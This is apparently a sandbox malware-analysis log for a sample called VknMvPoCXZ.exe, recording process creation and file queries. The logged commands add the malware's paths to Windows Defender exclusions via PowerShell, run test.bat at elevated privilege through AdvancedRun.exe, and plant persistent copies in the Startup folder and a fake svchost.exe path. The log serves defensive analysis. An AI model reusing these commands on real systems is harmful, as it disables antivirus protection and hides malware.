                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,6_2_00401C26
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Users\user\Desktop\VknMvPoCXZ.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
